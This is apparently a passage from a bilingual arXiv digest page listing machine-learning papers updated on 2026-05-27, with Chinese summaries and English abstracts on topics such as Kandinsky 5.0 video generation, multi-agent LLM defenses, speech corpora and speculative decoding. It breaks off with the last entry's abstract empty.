This report introduces Kandinsky 5.0, a family of state-of-the-art foundation models for high-resolution image and 10-second video synthesis. The framework comprises three core line-up of models: Kandinsky 5.0 Image Lite - a line-up of 6B parameter image generation models, Kandinsky 5.0 Video Lite - a fast and lightweight 2B parameter text-to-video and image-to-video models, and Kandinsky 5.0 Video Pro - 19B parameter models that achieves superior video generation quality. We provide a comprehensive review of the data curation lifecycle - including collection, processing, filtering and clustering - for the multi-stage training pipeline that involves extensive pre-training and incorporates quality-enhancement techniques such as self-supervised fine-tuning (SFT) and reinforcement learning (RL)-based post-training. We also present novel architectural, training, and inference optimizations that enable Kandinsky 5.0 to achieve high generation speeds and state-of-the-art performance across various tasks, as demonstrated by human evaluation. As a large-scale, publicly available generative framework, Kandinsky 5.0 leverages the full potential of its pre-training and subsequent stages to be adapted for a wide range of generative applications. We hope that this report, together with the release of our open-source code and training checkpoints, will substantially advance the development and accessibility of high-quality generative models for the research community.

2511.14075 2026-05-27 cs.LG cs.AI 版本更新

CFG-OEC: Classifier Free Guidance with Orthogonal Error Correction

CFG-OEC: 带正交误差校正的无分类器引导

Nakgyu Yang, Yechan Lee, SooJean Han

发表机构 * School of Electrical Engineering, Korea Advanced Institute of Science(韩国科学技术院电子工程学院)

AI总结 针对扩散模型中无分类器引导的采样规则与训练目标不匹配导致的误差,提出正交误差校正方法(CFG-OEC)通过减少条件与无条件预测误差的交互项来提升采样质量,并在Stable Diffusion上验证了FID和CLIP分数的改进。

详情
AI中文摘要

无分类器引导是扩散模型中条件采样的标准方法,但其采样规则与训练中使用的目标不一致。这种不匹配通过条件预测误差和无条件预测误差的相互作用引入了结构性采样误差。我们通过将采样误差分解为基础项和由两个误差对齐决定的交叉项来分析该问题。基于此分析,我们提出了带正交误差校正的无分类器引导(CFG-OEC),这是一种减少交互项的结构性修改。对于无法观测到真实噪声的实际场景,我们引入了一个从模型预测计算得到的代理量,以及一种跨扩散时间步稳定校正的动态方法。在受控环境下的实验验证了我们的理论误差分解和代理量构造。在Stable Diffusion v1.5和Stable Diffusion XL上的图像生成表明,CFG-OEC在多个采样器和引导机制下比CFG和CFG++改进了FID和CLIP分数。

英文摘要

Classifier free guidance is a standard method for conditional sampling in diffusion models, but its sampling rule is not aligned with the objective used in training. This mismatch induces a structural sampling error through the interaction of conditional and unconditional prediction errors. We analyze this issue by decomposing the sampling error into a base term and a cross term determined by the alignment of the two errors. Based on this analysis we propose CFG with orthogonal error correction (CFG-OEC), a structural modification that reduces the interaction term. For practical settings where ground truth noise is not observable, we introduce a proxy computed from model predictions and a dynamic method that stabilizes correction across diffusion timesteps. Experiments in a controlled environment validate our theoretical error decomposition and proxy construction. Image generation on Stable Diffusion v1.5 and Stable Diffusion XL show that CFG-OEC improves FID and CLIP scores over CFG and CFG++ across multiple samplers and guidance regimes.

2511.07667 2026-05-27 cs.AI 版本更新

AI-Driven Contribution Evaluation and Conflict Resolution: A Framework & Design for Group Workload Investigation

AI驱动的贡献评估与冲突解决:群体工作量调查的框架与设计

Jakub Slapek, Mir Seyedebrahimi, Jianhua Yang

发表机构 * University of Warwick(沃里克大学) Warwick Manufacturing Group(沃里克制造集团)

AI总结 提出一个AI增强的框架和实现设计,通过整合异构工件并利用大语言模型进行验证和上下文分析,以解决团队中个人贡献的公平评估和冲突解决难题。

Comments 20 pages, 8 figures, 8 tables

详情
AI中文摘要

团队中个人贡献的公平评估仍然是一个持续的挑战,工作量的冲突和差异可能导致不公平的绩效评估,通常需要人工干预——这是一个成本高昂且困难的过程。我们调查了现有工具的功能,并发现了冲突解决方法和AI集成方面的空白。为了解决这个问题,我们提出了一种新颖的AI增强工具的框架和实现设计,该工具协助争议调查。该框架将异构工件——提交物(代码、文本、媒体)、通信(聊天、电子邮件)、协调记录(会议日志、任务)、同行评估和上下文信息——组织成三个维度,包含九个基准:贡献、互动和角色。客观度量被归一化,按维度聚合,并与不平等度量(基尼指数)配对,以揭示冲突标记。大语言模型(LLM)架构对这些度量进行验证和上下文分析,以生成可解释且透明的咨询判断。我们论证了在当前法规和机构政策下的可行性,并概述了实际分析(情感、任务忠实度、字数/行数等)、偏见防护、限制和实际挑战。

英文摘要

The equitable assessment of individual contribution in teams remains a persistent challenge, where conflict and disparity in workload can result in unfair performance evaluation, often requiring manual intervention - a costly and challenging process. We survey existing tool features and identify a gap in conflict resolution methods and AI integration. To address this, we propose a framework and implementation design for a novel AI-enhanced tool that assists in dispute investigation. The framework organises heterogeneous artefacts - submissions (code, text, media), communications (chat, email), coordination records (meeting logs, tasks), peer assessments, and contextual information - into three dimensions with nine benchmarks: Contribution, Interaction, and Role. Objective measures are normalised, aggregated per dimension, and paired with inequality measures (Gini index) to surface conflict markers. A Large Language Model (LLM) architecture performs validated and contextual analysis over these measures to generate interpretable and transparent advisory judgments. We argue for feasibility under current statutory and institutional policy, and outline practical analytics (sentimental, task fidelity, word/line count, etc.), bias safeguards, limitations, and practical challenges.

2511.04711 2026-05-27 cs.CR cs.AI cs.LG 版本更新

SWAP: Towards Copyright Auditing of Soft Prompts via Sequential Watermarking

SWAP:通过顺序水印实现软提示的版权审计

Wenyuan Yang, Yichen Sun, Changzheng Chen, Zhixuan Chu, Jiaheng Zhang, Yiming Li, Dacheng Tao

发表机构 * Sun Yat-sen University(中山大学) Zhejiang University(浙江大学) National University of Singapore(新加坡国立大学) Nanyang Technological University(南洋理工大学)

AI总结 针对软提示的版权保护问题,提出一种基于顺序水印的审计方法SWAP,通过将水印嵌入到更复杂的输出分布顺序空间中,实现无害且鲁棒的版权验证。

Comments This paper has been accepted by the International Journal of Computer Vision (IJCV), 2026. The first two authors contributed equally to this work. 28 pages

详情
AI中文摘要

大规模视觉语言模型,尤其是CLIP,在各种下游任务中展现了卓越的性能。软提示作为精心设计的模块,能够高效地将视觉语言模型适应特定任务,因此需要有效的版权保护。本文通过审计可疑的第三方模型是否使用了受保护的软提示,来研究模型版权保护。虽然这可以视为模型所有权审计的一个特例,但我们的分析表明,由于提示学习的独特特性,现有技术效果不佳。非侵入式审计在独立模型与受害模型共享相似数据分布时,本质上容易产生误报。侵入式方法也失败:为CLIP设计的后门方法无法嵌入功能性触发器,而将传统DNN后门技术扩展到提示学习则面临有害性和模糊性挑战。我们发现,侵入式审计的这些失败源于同一个根本原因:水印与主任务在同一决策空间中运行,却追求相反的目标。基于这些发现,我们提出了软提示的顺序水印(SWAP),将水印植入一个不同且更复杂的空间。SWAP通过防御者指定的分布外类别的特定顺序来编码水印,灵感来自CLIP的零样本预测能力。这种嵌入在更复杂空间中的水印保持原始预测标签不变,从而减少与主任务的冲突。我们进一步为SWAP设计了基于假设检验的验证协议,并提供了验证何时有效的理论分析。在11个数据集上的大量实验证明了SWAP的有效性、无害性以及对潜在攻击的鲁棒性。

英文摘要

Large-scale vision-language models, especially CLIP, have demonstrated remarkable performance across diverse downstream tasks. Soft prompts, as carefully crafted modules that efficiently adapt vision-language models to specific tasks, necessitate effective copyright protection. In this paper, we investigate model copyright protection by auditing whether suspicious third-party models incorporate protected soft prompts. While this can be viewed as a special case of model ownership auditing, our analysis shows that existing techniques are ineffective due to prompt learning's unique characteristics. Non-intrusive auditing is inherently prone to false positives when independent models share similar data distributions with victim models. Intrusive approaches also fail: backdoor methods designed for CLIP cannot embed functional triggers, while extending traditional DNN backdoor techniques to prompt learning suffers from harmfulness and ambiguity challenges. We find that these failures in intrusive auditing stem from the same fundamental reason: watermarking operates within the same decision space as the primary task yet pursues opposing objectives. Motivated by these findings, we propose sequential watermarking for soft prompts (SWAP), which implants watermarks into a different and more complex space. SWAP encodes watermarks through a specific order of defender-specified out-of-distribution classes, inspired by the zero-shot prediction capability of CLIP. This watermark, which is embedded in a more complex space, keeps the original prediction label unchanged, making it less opposed to the primary task. We further design a hypothesis-test-guided verification protocol for SWAP and provide a theoretical analysis of when verification works. Extensive experiments on 11 datasets demonstrate SWAP's effectiveness, harmlessness, and robustness against potential attacks.

2511.02525 2026-05-27 cs.LG cs.AI 版本更新

An End-to-End Learning Approach for Solving Capacitated Location-Routing Problems

一种用于求解带容量约束选址-路径问题的端到端学习方法

Changhao Miao, Yuntian Zhang, Tongyu Wu, Fang Deng, Chen Chen

发表机构 * National Key Lab of Autonomous Intelligent Unmanned Systems, Beijing Institute of Technology(中国自动化智能无人系统国家级实验室,北京理工大学)

AI总结 提出基于深度强化学习与异构查询机制(DRLHQ)的端到端方法,首次将编码器-解码器结构应用于带容量约束的选址-路径问题(CLRP)及其开放变体(OCLRP),通过异构查询注意力机制动态协调选址与路径决策,在合成和基准数据集上优于传统方法和现有DRL基线。

详情
AI中文摘要

带容量约束的选址-路径问题(CLRPs)是组合优化中的经典问题,需要同时做出选址和路径决策。在CLRPs中,复杂的约束以及各种决策之间的复杂关系使得问题难以求解。随着深度强化学习(DRL)的出现,它已被广泛应用于解决车辆路径问题及其变体,而与CLRPs相关的研究仍有待探索。在本文中,我们提出了带有异构查询的DRL(DRLHQ)来分别求解CLRP和开放CLRP(OCLRP)。我们是首个为CLRPs提出端到端学习方法的工作,遵循编码器-解码器结构。具体而言,我们将CLRPs重新表述为一个针对各种决策量身定制的马尔可夫决策过程,这是一个通用的建模框架,可适用于其他基于DRL的方法。为了更好地处理选址和路径决策之间的相互依赖关系,我们还引入了一种新颖的异构查询注意力机制,旨在动态适应不同的决策阶段。在合成和基准数据集上的实验结果表明,我们提出的方法在求解CLRP和OCLRP时,相较于代表性的传统方法和基于DRL的基线,具有更优的解质量和更好的泛化性能。

英文摘要

The capacitated location-routing problems (CLRPs) are classical problems in combinatorial optimization, which require simultaneously making location and routing decisions. In CLRPs, the complex constraints and the intricate relationships between various decisions make the problem challenging to solve. With the emergence of deep reinforcement learning (DRL), it has been extensively applied to address the vehicle routing problem and its variants, while the research related to CLRPs still needs to be explored. In this paper, we propose the DRL with heterogeneous query (DRLHQ) to solve CLRP and open CLRP (OCLRP), respectively. We are the first to propose an end-to-end learning approach for CLRPs, following the encoder-decoder structure. In particular, we reformulate the CLRPs as a markov decision process tailored to various decisions, a general modeling framework that can be adapted to other DRL-based methods. To better handle the interdependency across location and routing decisions, we also introduce a novel heterogeneous querying attention mechanism designed to adapt dynamically to various decision-making stages. Experimental results on both synthetic and benchmark datasets demonstrate superior solution quality and better generalization performance of our proposed approach over representative traditional and DRL-based baselines in solving both CLRP and OCLRP.

2510.19420 2026-05-27 cs.CR cs.AI cs.LG cs.MA math.OC 版本更新

Securing Multi-Agent Systems Against Corruptions via Node Contribution Backpropagation

通过节点贡献反向传播保护多智能体系统免受腐败影响

Chengcan Wu, Zhixin Zhang, Mingqian Xu, Zeming Wei, Meng Sun

发表机构 * Peking University(北京大学)

AI总结 针对多智能体系统中对抗性智能体注入误导信息的问题,提出一种基于有向无环图的反向传播动态防御方法,通过计算每个智能体对最终决策的贡献来识别和隔离恶意智能体,实验表明该方法优于现有防御机制。

Comments ICML 2026

详情
AI中文摘要

多智能体系统(MAS)已成为大型语言模型(LLM)应用的普遍范式。然而,MAS中复杂的多智能体设计引入了独特的可信度问题:对抗性智能体可以注入误导信息,这些信息通过系统传染性地传播,破坏良性智能体并导致错误输出。现有的基于图的防御将智能体建模为节点,通信建模为边,但仅限于静态图防御。在本文中,我们提出了一种动态防御范式,将MAS通信建模为带符号的有向无环图,并通过反向传播计算每个智能体对最终决策的贡献,从而能够准确识别和隔离恶意智能体,以保护多智能体任务协作。在复杂和动态的MAS环境中的实验结果表明,我们的方法显著优于现有的MAS防御机制,为可信赖的MAS部署提供了有效的保障。我们的代码可在https://github.com/ChengcanWu/BPD获取。

英文摘要

Multi-Agent Systems (MAS) have become a prevalent paradigm for Large Language Model (LLM) applications. However, the complex multi-agent design in MAS introduces unique trustworthiness concerns: adversarial agents can inject misleading information that propagates contagiously through the system, corrupting benign agents and leading to false outputs. Existing graph-based defenses model agents as nodes and communications as edges, yet are limited to static-graph defenses. In this paper, we propose a dynamic defense paradigm that models MAS communication as a signed directed acyclic graph and computes each agent's contribution to the final decision via backward propagation, enabling accurate identification and isolation of malicious agents to secure multi-agent task collaboration. Experimental results in complex and dynamic MAS environments demonstrate that our method notably outperforms existing MAS defense mechanisms, providing an effective guardrail for trustworthy MAS deployment. Our code is available at https://github.com/ChengcanWu/BPD.

2510.10774 2026-05-27 cs.SD cs.AI cs.HC cs.LG 版本更新

ParsVoice: A Large-Scale Multi-Speaker Persian Speech Corpus for Text-to-Speech Synthesis

ParsVoice: 面向文本到语音合成的大规模多说话人波斯语语音语料库

Mohammad Javad Ranjbar Kalahroodi, Heshaam Faili, Azadeh Shakery

发表机构 * School of Electrical and Computer Engineering, University of Tehran(塔里哈大学电气与计算机工程学院) Institute for Research in Fundamental Sciences (IPM)(基础科学研究所(IPM))

AI总结 提出ParsVoice,目前最大的公开波斯语语音-文本语料库,通过可扩展的流水线从长篇有声读物构建高质量数据,用于训练多说话人TTS系统,并验证了其在零样本多说话人TTS中的有效性。

详情
AI中文摘要

波斯语在开放的语音-文本资源中仍然严重不足,限制了多说话人文本到语音(TTS)、语音语言建模和低资源语音处理的进展。我们介绍了ParsVoice,这是目前最大的公开波斯语语音-文本语料库,专为训练多说话人TTS系统而设计,同时提供了一个可扩展的流水线,用于从长篇有声读物录音中构建高质量的语音-文本数据。该流水线结合了微调的ParsBERT句子补全分类器、基于ASR的边界优化、标点恢复、说话人识别以及涵盖音频和波斯语特定文本属性的多维质量评估。最终发布的版本包含一个2200小时的TTS就绪子集,包含来自1815个自动识别说话人ID的136万个对齐片段,比之前最大的公开波斯语TTS数据集大25倍以上。为了验证该语料库,我们微调了XTTS,一个直接操作原始波斯语文本(无需音素表示)的零样本多语言TTS模型,实现了自然度MOS为3.6/5,说话人相似度MOS为4.0/5。ParsVoice数据集公开在:https://huggingface.co/datasets/MohammadJRanjbar/ParsVoice。

英文摘要

Persian remains substantially underrepresented in open speech-text resources, limiting progress in multi-speaker text-to-speech (TTS), speech-language modelling, and low-resource speech processing. We introduce ParsVoice, the largest publicly available Persian speech-text corpus tailored for training multi-speaker TTS systems, along with a scalable pipeline to construct high-quality speech-text data from long-form audiobook recordings. The pipeline combines a fine-tuned ParsBERT sentence-completion classifier, ASR-based boundary optimization, punctuation restoration, speaker identification, and a multi-dimensional quality assessment that covers both audio and Persian-specific text properties. The resulting release contains a 2,200-hour TTS-ready subset with 1.36 million aligned segments from 1,815 automatically identified speaker IDs, making it more than 25 times larger than the previously largest open Persian TTS dataset. To validate the corpus, we fine-tune XTTS, a zero-shot multilingual TTS model that operates directly on raw Persian text without phoneme representations, achieving a naturalness MOS of 3.6/5 and speaker similarity MOS of 4.0/5. The ParsVoice dataset is publicly available at: https://huggingface.co/datasets/MohammadJRanjbar/ParsVoice.

2509.04310 2026-05-27 cs.AI 版本更新

EvoEmo: Towards Evolved Emotional Policies for Adversarial LLM Agents in Multi-Turn Price Negotiation

EvoEmo:面向多轮价格谈判中对抗性LLM智能体的进化情感策略

Yunbo Long, Liming Xu, Lukas Beckenbauer, Yuhan Liu, Alexandra Brintrup

发表机构 * Department of Engineering, University of Cambridge(剑桥大学工程系) Rotman School of Management, University of Toronto(多伦多大学罗特曼管理学院) TUM School of Management, Technical University of Munich(慕尼黑技术大学管理学院) The Alan Turing Institute, London, UK(伦敦阿尔安·图灵研究院)

AI总结 提出EvoEmo进化强化学习框架,通过将情感状态转移建模为马尔可夫决策过程并采用种群遗传优化,动态优化多轮谈判中的情感表达,显著提升LLM智能体的谈判成功率、效率和买家节省。

详情
AI中文摘要

最近关于大型语言模型(LLM)中思维链(CoT)推理的研究表明,智能体可以参与 extit{复杂}、 extit{多轮}谈判,为智能体AI开辟了新途径。然而,现有的LLM智能体在很大程度上忽略了情感在此类谈判中的功能作用,而是生成被动、偏好驱动的情感反应,使其容易受到对抗方的操纵和策略性利用。为弥补这一差距,我们提出了EvoEmo,一个进化强化学习框架,用于优化谈判中的动态情感表达。EvoEmo将情感状态转移建模为马尔可夫决策过程,并采用基于种群的遗传优化,在多样化的谈判场景中进化出高奖励的情感策略。我们进一步提出了一个评估框架,包含两个基线——原始策略和固定情感策略——用于基准测试情感感知谈判。大量实验和消融研究表明,EvoEmo在成功率、效率和买家节省方面均持续优于两个基线。这一发现强调了适应性情感表达在使LLM智能体更有效地进行多轮谈判中的重要性。代码可在\href{https://github.com/Yunbo-max/EvoEmo}{ extcolor{red}{https://github.com/Yunbo-max/EvoEmo}}获取。

英文摘要

Recent research on Chain-of-Thought (CoT) reasoning in Large Language Models (LLMs) has demonstrated that agents can engage in \textit{complex}, \textit{multi-turn} negotiations, opening new avenues for agentic AI. However, existing LLM agents largely overlook the functional role of emotions in such negotiations, instead generating passive, preference-driven emotional responses that make them vulnerable to manipulation and strategic exploitation by adversarial counterparts. To address this gap, we present EvoEmo, an evolutionary reinforcement learning framework that optimizes dynamic emotional expression in negotiations. EvoEmo models emotional state transitions as a Markov Decision Process and employs population-based genetic optimization to evolve high-reward emotion policies across diverse negotiation scenarios. We further propose an evaluation framework with two baselines -- vanilla strategies and fixed-emotion strategies -- for benchmarking emotion-aware negotiation. Extensive experiments and ablation studies show that EvoEmo consistently outperforms both baselines, achieving higher success rates, higher efficiency, and increased buyer savings. This findings highlight the importance of adaptive emotional expression in enabling more effective LLM agents for multi-turn negotiation. The code is available at \href{https://github.com/Yunbo-max/EvoEmo}{\textcolor{red}{https://github.com/Yunbo-max/EvoEmo}}.

2506.23274 2026-05-27 cs.LG cs.AI 版本更新

Real-Time Progress Prediction in Reasoning Language Models

推理语言模型中的实时进度预测

Hans Peter Lyngsøe Raaschou-Jensen, Constanza Fierro, Anders Søgaard

发表机构 * Department of Computer Science, University of Copenhagen(哥本哈根大学计算机科学系)

AI总结 研究通过离散化推理轨迹训练线性探针和微调模型生成0-100%进度估计,实现推理语言模型中的实时进度预测,并在数学推理任务上达到0.161 MAE。

详情
AI中文摘要

最近的推理语言模型,特别是那些采用长潜在思维链的模型,在复杂的智能体任务上表现出色。然而,随着这些模型在越来越长的时间范围内运行,其内部进展对用户变得不透明,使得期望管理和实时监督变得困难。在这项工作中,我们研究了对此类模型进行实时进度预测的可行性。我们首先通过离散化推理轨迹并训练线性探针对推理状态进行分类,测试隐藏状态是否编码进度信息。然后,我们微调模型以在思维链推理过程中生成0-100%的进度估计。我们最强的进度报告检查点在数学推理轨迹上达到了0.161的平均绝对误差,并在此设置中优于位置基线。最后,我们通过测量相同部分展开中隐含进度值的变化程度,量化了进度标签的内在模糊性。这种模糊性在Qwen3-4B中最低,其延续产生的展开离散度最小,表明更大的模型可以通过减少剩余解决方案长度的变化来使进度标签更稳定。

英文摘要

Recent reasoning language models, particularly those that employ long latent chains of thought, achieve strong performance on complex agentic tasks. However, as these models operate over increasingly long time horizons, their internal progress becomes opaque to users, making expectation management and real-time oversight difficult. In this work, we investigate whether real-time progress prediction is feasible for such models. We first test whether hidden states encode progress information by discretizing reasoning trajectories and training a linear probe to classify reasoning states. We then fine-tune models to generate progress estimates from 0--100\% during chain-of-thought reasoning. Our strongest progress-reporting checkpoint reaches 0.161 MAE on mathematical reasoning traces and outperforms position baselines in this setting. Finally, we quantify the intrinsic ambiguity of progress labels by measuring how much the implied progress value varies from the same partial rollout. This ambiguity is lowest for Qwen3-4B, whose continuations produce the smallest rollout dispersion, suggesting that larger models can make progress labels more stable by reducing variation in remaining solution length.

2510.06843 2026-05-27 cs.CL cs.AI 版本更新

Self-signals Driven Multi-LLM Debate for Efficient and Accurate Reasoning

自信号驱动的多LLM辩论以实现高效准确的推理

Xuhang Chen, Zhifan Song, Deyi Ji, Shuo Gao, Lanyun Zhu

发表机构 * University of Cambridge(剑桥大学) Sorbonne Université(索邦大学) University of Science and Technology of China(中国科学技术大学) Beihang University(北航大学) Nanyang Technological University(南洋理工大学)

AI总结 提出一种利用模型级置信度和token级语义焦点两种自信号来自适应引导多LLM辩论过程的方法,在提高准确性的同时减少token消耗。

详情
AI中文摘要

大型语言模型(LLMs)在 diverse 应用领域展现了令人印象深刻的能力。最近的工作探索了多LLM智能体辩论(MAD),通过使多个LLM迭代讨论和细化响应来增强性能。然而,现有的MAD方法主要关注利用外部结构(如辩论图)和LLM作为评判者,而忽略了生成过程中出现的自信号(如token logits和注意力)。这种遗漏导致了冗余计算和潜在的性能下降。在本文中,我们将重点转移到多LLM辩论的自信号上,并引入了一种自信号驱动的多LLM辩论(SID),它利用两种类型的自信号:模型级置信度和token级语义焦点,来自适应地引导辩论过程。我们的方法使高置信度智能体能够在模型级别提前退出,并基于注意力机制压缩冗余辩论内容。我们在多个具有挑战性的基准测试上,对各种LLMs和多模态LLMs评估了我们的方法。实验结果表明,我们的方法不仅在准确性上优于现有的MAD技术,而且还减少了token消耗,突显了利用自信号在提高多智能体辩论系统的性能和效率方面的有效性。我们的代码将在~\href{https://github.com/xuhang2019/SID}{ exttt{https://github.com/xuhang2019/SID}} 上提供。

英文摘要

Large Language Models (LLMs) have exhibited impressive capabilities across diverse application domains. Recent work has explored Multi-LLM Agent Debate (MAD) as a way to enhance performance by enabling multiple LLMs to discuss and refine responses iteratively. Nevertheless, existing MAD methods predominantly focus on utilizing external structures, such as debate graphs, using LLM-as-a-Judge, while neglecting the application of self signals, such as token logits and attention, that arise during generation. This omission leads to redundant computation and potential performance degradation. In this paper, we shift the focus to the self signals of multi-LLM debate and introduce a Self-Signals Driven Multi-LLM Debate (SID), which leverages two types of self-signals: model-level confidence and token-level semantic focus, to adaptively guide the debate process. Our approach enables high-confidence agents to exit early at the model level and compress the redundant debate contents based on the attention mechanism. We evaluate our method on various LLMs and Multimodal LLMs across multiple challenging benchmarks. Experimental results demonstrate that our method not only outperforms existing MAD techniques in accuracy but also reduces token consumption, highlighting the effectiveness of utilizing self signals in enhancing both the performance and efficiency of multi-agent debate systems. Our code will be available at~\href{https://github.com/xuhang2019/SID}{\texttt{https://github.com/xuhang2019/SID}}.

2510.06381 2026-05-27 cs.LG cs.AI 版本更新

Monte Carlo Permutation Search

蒙特卡洛排列搜索

Tristan Cazenave

AI总结 提出一种改进GRAVE算法的通用蒙特卡洛树搜索算法MCPS,通过利用路径上所有节点的统计信息,在多种游戏中优于GRAVE,并给出了统计权重公式的数学推导。

详情
AI中文摘要

我们提出蒙特卡洛排列搜索(MCPS),一种改进GRAVE算法的通用蒙特卡洛树搜索(MCTS)算法。当深度强化学习不可行或游戏前可用计算资源有限时(如通用游戏博弈),MCPS具有相关性。MCPS的原理是在节点的探索项中包含从根节点到该节点路径上所有走法的所有模拟的统计信息。我们在多种游戏上测试MCPS:Hex、Go、AtariGo、NoGo和一个Wargame。MCPS几乎总是优于GRAVE。我们还提供了用于加权三种统计来源的公式的数学推导。这些公式是对GRAVE公式的改进,因为它们不再使用GRAVE的偏差超参数。

英文摘要

We propose Monte Carlo Permutation Search (MCPS), a general-purpose Monte Carlo Tree Search (MCTS) algorithm that improves upon the GRAVE algorithm. MCPS is relevant when deep reinforcement learning is not an option or when the computing power available before play is not substantial, such as in General Game Playing. The principle of MCPS is to include in the exploration term of a node the statistics on all the playouts that contain all the moves on the path from the root to the node. We test MCPS on a variety of games: Hex, Go, AtariGo, NoGo and a Wargame. MCPS almost always outperforms GRAVE. We also provide a mathematical derivation of the formulas used for weighting the three sources of statistics. These formulas are an improvement on the GRAVE formula since they no longer use the bias hyperparameter of GRAVE.

2510.01833 2026-05-27 cs.AI cs.CL 版本更新

Plan Then Action:High-Level Planning Guidance Reinforcement Learning for LLM Reasoning

先规划后行动:面向LLM推理的高层规划引导强化学习

Zhihao Dou, Qinjian Zhao, Zhongwei Wan, Dinggen Zhang, Weida Wang, Towsif Raiyan, Benteng Chen, Qingtao Pan, Yang Ouyang, Chaoda Song, Zhiqiang Gao, Shufei Zhang, Sumon Biswas

发表机构 * Case Western Reserve University, Cleveland, OH, USA(凯斯西储大学) Kean University, Union, NJ, USA(凯恩大学) The Ohio State University, Columbus, OH, USA(俄亥俄州立大学) Fudan University, Shanghai, China(复旦大学) Shanghai Artificial Intelligence Laboratory, Shanghai, China(上海人工智能实验室) The University of Hong Kong, Hong Kong, China(香港大学) North Carolina State University, Raleigh, NC, USA(北卡罗来纳州立大学)

AI总结 提出PTA-GRPO两阶段框架,通过高层规划引导与强化学习联合优化,提升LLM在数学和自然科学推理任务中的准确性和泛化能力。

Comments 19 pages and 5 figures

详情
AI中文摘要

大型语言模型(LLMs)通过思维链(CoT)展现出强大的推理能力,但其token级别的生成倾向于局部决策,缺乏全局规划,常常导致冗余或不准确的推理。现有方法(如基于树的搜索和强化学习)试图解决这一问题,但计算成本高,且仍难以产生可靠的推理轨迹。为应对这些挑战,我们提出先规划后行动增强推理与组相对策略优化(PTA-GRPO),这是一个两阶段框架,旨在联合改进高层规划和细粒度CoT推理。具体而言,在第一阶段,给定LLM负责将CoT推理总结为紧凑的高层指导,然后用于监督微调。接着,我们引入一种指导感知的强化学习方法,联合优化最终输出和指导质量,提升推理效果。我们在数学和自然科学的十个推理基准上,使用五个覆盖多种数据模态的多样化基础模型进行评估。结果表明,PTA-GRPO在模型和任务上持续带来显著改进,展现出强大的有效性和泛化能力。

英文摘要

Large language models (LLMs) demonstrate strong reasoning abilities via Chain-of-Thought (CoT), but their token-level generation encourages local decisions and lacks global planning, often leading to redundant or inaccurate reasoning. Existing methods, such as tree-based search and reinforcement learning (RL), attempt to address this issue but incur high computational costs and still struggle to produce reliable reasoning trajectories. To address these challenges, we propose Plan-Then-Action Enhanced Reasoning with Group Relative Policy Optimization (PTA-GRPO), a two-stage framework designed to jointly improve high-level planning and fine-grained CoT reasoning. Specifically, in the first stage, a given LLM is responsible for summarizing CoT reasoning into compact high-level guidance, which is then leveraged for supervised fine-tuning. Then, we introduce a guidance-aware reinforcement learning method that jointly optimizes the final output and the quality of guidance, enhancing reasoning effectiveness. We evaluate PTA-GRPO on ten reasoning benchmarks across mathematics and natural sciences, using five diverse base models spanning multiple data modalities. The results show that PTA-GRPO consistently delivers significant improvements across models and tasks, demonstrating strong effectiveness and generalization.

2510.01336 2026-05-27 cs.CL cs.AI cs.LG 版本更新

HiSpec: Hierarchical Speculative Decoding for LLMs

HiSpec: 分层推测解码用于大语言模型

Avinash Kumar, Sujay Sanghavi, Poulami Das

发表机构 * Department of Electrical and Computer Engineering, The University of Texas at Austin(德克萨斯大学奥斯汀分校电子与计算机工程系)

AI总结 提出HiSpec框架,利用早期退出模型进行低开销中间验证,通过重用键值缓存和隐藏状态提高吞吐量,平均加速1.28倍,最高2.01倍,且不损失准确性。

详情
AI中文摘要

推测解码通过使用较小的草稿模型推测令牌,再由较大的目标模型验证,从而加速LLM推理。验证通常是瓶颈(例如,当3B模型为70B目标模型推测时,验证速度比令牌生成慢4倍),但大多数先前工作只关注加速草稿生成。“中间”验证通过早期丢弃不准确的草稿令牌来减少验证时间,但现有方法在引入中间验证器时会产生大量训练开销,增加内存占用以协调中间验证步骤,并依赖近似启发式方法损害准确性。我们提出$\underline{\textit{Hi}}\textit{erarchical }\underline{\textit{Spec}}\textit{ulative Decoding (HiSpec)}$,一种高吞吐量推测解码框架,利用早期退出模型进行低开销中间验证。早期退出模型允许令牌通过跳过层遍历提前退出,并经过显式训练,使得选定层的隐藏状态可解释,从而在不显著增加计算和内存开销的情况下,非常适合中间验证。为了进一步提高资源效率,我们设计了一种方法,使HiSpec能够在草稿模型、中间验证器和目标模型之间重用键值缓存和隐藏状态。为了保持准确性,HiSpec定期针对目标模型验证中间验证器接受的草稿令牌。我们在各种代表性基准和模型上的评估表明,与基线单层推测相比,HiSpec平均提高吞吐量1.28倍,最高达2.01倍,且不损失准确性。

英文摘要

Speculative decoding accelerates LLM inference by using a smaller draft model to speculate tokens that a larger target model verifies. Verification is often the bottleneck (e.g. verification is $4\times$ slower than token generation when a 3B model speculates for a 70B target model), but most prior works focus only on accelerating drafting. $\textit{``Intermediate"}$ verification reduces verification time by discarding inaccurate draft tokens early, but existing methods incur substantial training overheads in incorporating the intermediate verifier, increase the memory footprint to orchestrate the intermediate verification step, and compromise accuracy by relying on approximate heuristics. We propose $\underline{\textit{Hi}}\textit{erarchical }\underline{\textit{Spec}}\textit{ulative Decoding (HiSpec)}$, a framework for high-throughput speculative decoding that exploits $\textit{early-exit (EE) models}$ for low-overhead intermediate verification. EE models allow tokens to exit early by skipping layer traversal and are explicitly trained so that hidden states at selected layers can be interpreted, making them uniquely suited for intermediate verification without drastically increasing compute and memory overheads. To improve resource-efficiency even further, we design a methodology that enables HiSpec to re-use key-value caches and hidden states between the draft, intermediate verifier, and target models. To maintain accuracy, HiSpec periodically validates the draft tokens accepted by the intermediate verifier against the target model. Our evaluations using various representative benchmarks and models show that HiSpec improves throughput by 1.28$\times$ on average and by up to 2.01$\times$ compared to the baseline single-layer speculation without compromising accuracy.

2509.26600 2026-05-27 cs.CL cs.AI 版本更新

When LLMs Benchmark Themselves: Deconstructing Self-Bias in Automated Evaluation

当LLM自我基准测试:解构自动评估中的自我偏见

Wenda Xu, Sweta Agrawal, Vilém Zouhar, Markus Freitag, Daniel Deutsch

发表机构 * Google(谷歌) ETH Zurich(苏黎世联邦理工学院)

AI总结 研究LLM自动创建基准测试时存在的自我偏见问题,发现测试集生成和评估两个环节均产生偏见,导致模型偏爱自身输出,并提出了多样性指标以部分缓解该偏见。

详情
AI中文摘要

